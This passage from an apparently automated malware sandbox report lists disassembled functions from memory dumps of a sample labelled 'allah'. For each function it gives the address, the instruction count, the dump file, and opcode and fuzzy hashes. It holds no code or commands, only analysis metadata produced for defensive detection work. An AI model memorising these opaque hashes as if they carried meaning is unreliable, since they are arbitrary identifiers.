                                                                        • Opcode ID: b6cf25d4219139834554f0e2b9c4a66ccab9f5faa4410f517ff868ddb5166867
                                                                        • Instruction ID: fd51a6ae25f1b464b6de9d3d18bb1fe95ccac783c87a4c972d8e46cc030290da
                                                                        • Opcode Fuzzy Hash: b6cf25d4219139834554f0e2b9c4a66ccab9f5faa4410f517ff868ddb5166867
                                                                        • Instruction Fuzzy Hash: 7A0128A050E6450FD743EB34C4493B9BFD1DF84224F08467BD44CC60A2CE18CAC5C396
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B1B19 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d3973981095c2ef7f94dd225acb059a45112358fb17d39f4e57d09a95d23507e
                                                                        • Instruction ID: 2d03e6bf78622a52762c7839992f324c2f5cffa29825fbc51ed96961006d3325
                                                                        • Opcode Fuzzy Hash: d3973981095c2ef7f94dd225acb059a45112358fb17d39f4e57d09a95d23507e
                                                                        • Instruction Fuzzy Hash: AFF0F4F184D68C1FC756CF28881A5AB7FE4EF95241B04016FF449C72A2E62498088791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A7015 Relevance: .0, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8caf8282b926bac4bc6e0f4c860f0efebb5413462da7a2737eccf1e2598beacb
                                                                        • Instruction ID: 5fb965459319dd251400ec3a56813a7ef9af33492bf593ba912d0b9dd58cdb7c
                                                                        • Opcode Fuzzy Hash: 8caf8282b926bac4bc6e0f4c860f0efebb5413462da7a2737eccf1e2598beacb
                                                                        • Instruction Fuzzy Hash: B9F08295B265190AEB07B77DC41A7FA7286EF88741FA04877E85EC35C7CC68E8060691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A75F0 Relevance: .0, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 348ed057c06c64dbb4981a1af9ed0699925588fe8c26d1c209402a660063bb5e
                                                                        • Instruction ID: 842eb02c444513eadc88ea95aa5a2bd0401c5b66a8542dd830e57241ed3d2325
                                                                        • Opcode Fuzzy Hash: 348ed057c06c64dbb4981a1af9ed0699925588fe8c26d1c209402a660063bb5e
                                                                        • Instruction Fuzzy Hash: 8AF02EA5B296894BE756EF3CD40927177C5FF45215F5404FDE85FC32A2DE28DC418281
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC1E080D Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb457f338d1d51cb5e94632bff9345fc3b57f63655b2409e02279c612bc96878
                                                                        • Instruction ID: ccde62c4d5188c54d7b3541557f1577ee701bd8530bfe42021d3ebc6ba15cef5
                                                                        • Opcode Fuzzy Hash: fb457f338d1d51cb5e94632bff9345fc3b57f63655b2409e02279c612bc96878
                                                                        • Instruction Fuzzy Hash: 18E08063F0ED2E0EF6A6E11C74195F493C1DB8863574511F3D90DD3152DD09AC3581D5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B0D59 Relevance: .0, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8bf15c7851d5dcb693e583b0e43b85e6eea7fa07a0e53cc23a9cae6b2bbbb509
                                                                        • Instruction ID: 0a76bde11835faba5fd3ede304beb0609b4ba04c0cb232c03e3b0d392a646b91
                                                                        • Opcode Fuzzy Hash: 8bf15c7851d5dcb693e583b0e43b85e6eea7fa07a0e53cc23a9cae6b2bbbb509
                                                                        • Instruction Fuzzy Hash: 81D05BD3A4D50A49E5965568B45A0F55BC1FB90264B504576E88D824C6FD1FF5428140
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B1656 Relevance: .0, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 57b546e50019738db6c9d070fcc70b2b8b923f1faa16fad1f637d71b14bd9159
                                                                        • Instruction ID: a81a73746291e7f7346c77dc6b44bfd459d0b906303da586ac7fc54433714144
                                                                        • Opcode Fuzzy Hash: 57b546e50019738db6c9d070fcc70b2b8b923f1faa16fad1f637d71b14bd9159
                                                                        • Instruction Fuzzy Hash: B7E086F3A4D24247D749DE69E05A0EB7BD0EF98204F04067FF8CE97151DA19D501C786
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B166D Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a88d34712631f701673ec5f891a3ea8d37a442d5952f661c7277667a1194330
                                                                        • Instruction ID: 79caf3f44d13934bda0057de30b0c0701bdc32cd0e27ed52050ba73bbbe337c7
                                                                        • Opcode Fuzzy Hash: 1a88d34712631f701673ec5f891a3ea8d37a442d5952f661c7277667a1194330
                                                                        • Instruction Fuzzy Hash: 37E0E67160C6194BC705EF18D0554AE77E0FF98314F0046BFE48DD7251DA39D941C781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 00007FFBAC110C90 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5__^
                                                                        • API String ID: 0-815891306
                                                                        • Opcode ID: d78912437b5a47541f53878d7493c49e2464a2ee5fa18948c0f1d4be3e9f37d7
                                                                        • Instruction ID: 83a45f57a1a7984aa515da9b49b5cf5e5f2a188dd76365586144dbca23d3e5a4
                                                                        • Opcode Fuzzy Hash: d78912437b5a47541f53878d7493c49e2464a2ee5fa18948c0f1d4be3e9f37d7
                                                                        • Instruction Fuzzy Hash: 7541F9E7E5D2698FD702EB7CA8E51D23BA0EF0232870501B7C5C5CE163FA046C5AC6A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC112D98 Relevance: .1, Instructions: 126COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cb2116e0c25f2dcc7835ed67809bf126fa61c95fb1bd428afe5d640227ed59bc
                                                                        • Instruction ID: b7e221c9eb5a973ba4b2a71706045aa12f7ab57c8c4a58a9720a32f83b95056c
                                                                        • Opcode Fuzzy Hash: cb2116e0c25f2dcc7835ed67809bf126fa61c95fb1bd428afe5d640227ed59bc
                                                                        • Instruction Fuzzy Hash: 9231FCE7A1E2D64FE703463898B90D63F60DE9727530A14F7C9C0CB163EA1C880B9761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC1107D1 Relevance: .1, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9fb722940f45ff6648e3adba4b7cae228cb2948b833247ea8742b7c2aaa71f89
                                                                        • Instruction ID: dfb1968f364e42c0972c5c8e04a59e16cf2958dd76e3bbb85b2d0a4e3865ca0b
                                                                        • Opcode Fuzzy Hash: 9fb722940f45ff6648e3adba4b7cae228cb2948b833247ea8742b7c2aaa71f89
                                                                        • Instruction Fuzzy Hash: E93163A7E1E286CFD3539E7CD8A80D63BA0EF4621570501F7C5818B093DE28A416D7E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC110803 Relevance: .1, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 684a68df941dd6ce6fae9374159fe09f8956774a2393b8e9856fb1c57c79dfe4
                                                                        • Instruction ID: bd306a0b195866e8e64d8edecc4d92170889d26dd08ed08c658ca664094fea53
                                                                        • Opcode Fuzzy Hash: 684a68df941dd6ce6fae9374159fe09f8956774a2393b8e9856fb1c57c79dfe4
                                                                        • Instruction Fuzzy Hash: 33216067E1E285CFD3539A7CD8A80D63BA0AF8721570501F7C5D18B093DA28A41AD7E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%